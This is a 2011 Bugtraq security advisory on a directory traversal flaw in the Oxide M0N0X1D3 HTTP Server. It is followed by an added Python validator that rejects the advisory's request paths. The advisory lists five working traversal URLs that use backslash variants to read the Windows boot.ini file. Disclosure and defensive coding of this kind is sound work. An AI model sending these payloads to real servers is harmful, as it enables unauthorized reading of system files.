Message-Id: <201111291116.pATBGGcV001825@sf01web1.securityfocus.com>
Date: Tue, 29 Nov 2011 11:16:16 GMT
From: demonalex@....com
To: bugtraq@...urityfocus.com
Subject: Oxide M0N0X1D3 HTTP Server Directory Traversal Vulnerability

Title : Oxide M0N0X1D3 HTTP Server Directory Traversal Vulnerability

Software : Oxide M0N0X1D3 HTTP Server

Software Version : 20040223

Vendor: http://sourceforge.net/projects/oxide-ws/

Vulnerability Published : 2011-11-15

Vulnerability Update Time :

Status :

Impact : Medium

Bug Description :
Oxide M0N0X1D3 HTTP Server does not properly sanitise filenames containing directory traversal sequences that are received from an HTTP Browser.

Exploit :
****************************************************************
http://target/..\..\..\boot.ini
http://target/..\\..\\..\\boot.ini
http://target/..\/..\/..\/boot.ini
http://target//..\/..\/..\boot.ini
http://target/.\..\.\..\.\..\boot.ini
..
****************************************************************

Credits :
This vulnerability was discovered by demonalex(at)163(dot)com
Pentester/Researcher
Dark2S Security Team/PolyU.HK
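
The following is an added example, not part of the original advisory and not code from the Oxide project: a sketch of the request-path check whose absence the advisory describes, run against the five request paths listed above. The function name `resolve_request_path` and the document root argument are hypothetical; the check treats `\` and `/` as equivalent separators, as Windows file APIs do, and also covers percent-encoded forms, which goes slightly beyond the cases in the advisory.

```python
import os
from urllib.parse import unquote

# Request paths quoted in the advisory, with the host part removed.
ADVISORY_PATHS = [
    "/..\\..\\..\\boot.ini",
    "/..\\\\..\\\\..\\\\boot.ini",
    "/..\\/..\\/..\\/boot.ini",
    "//..\\/..\\/..\\boot.ini",
    "/.\\..\\.\\..\\.\\..\\boot.ini",
]


def resolve_request_path(doc_root, url_path):
    """Map a request path to a file under doc_root, or return None to reject."""
    decoded = unquote(url_path)          # decode %2e, %5c and similar first
    if "\x00" in decoded or ":" in decoded:
        return None                      # NUL truncation, drive letters, streams
    # Normalise both separator styles, then drop empty and "." segments.
    segments = [s for s in decoded.replace("\\", "/").split("/")
                if s not in ("", ".")]
    if ".." in segments:
        return None                      # refuse traversal instead of collapsing it
    root = os.path.realpath(doc_root)
    candidate = os.path.realpath(os.path.join(root, *segments))
    # Final containment check; also catches symlinks that point outside the root.
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


if __name__ == "__main__":
    root = os.getcwd()                   # constructed document root for the demo
    for path in ADVISORY_PATHS + ["/index.html", "/docs\\readme.txt"]:
        result = resolve_request_path(root, path)
        print(f"{path!r:45} -> {'REJECT' if result is None else result}")
```
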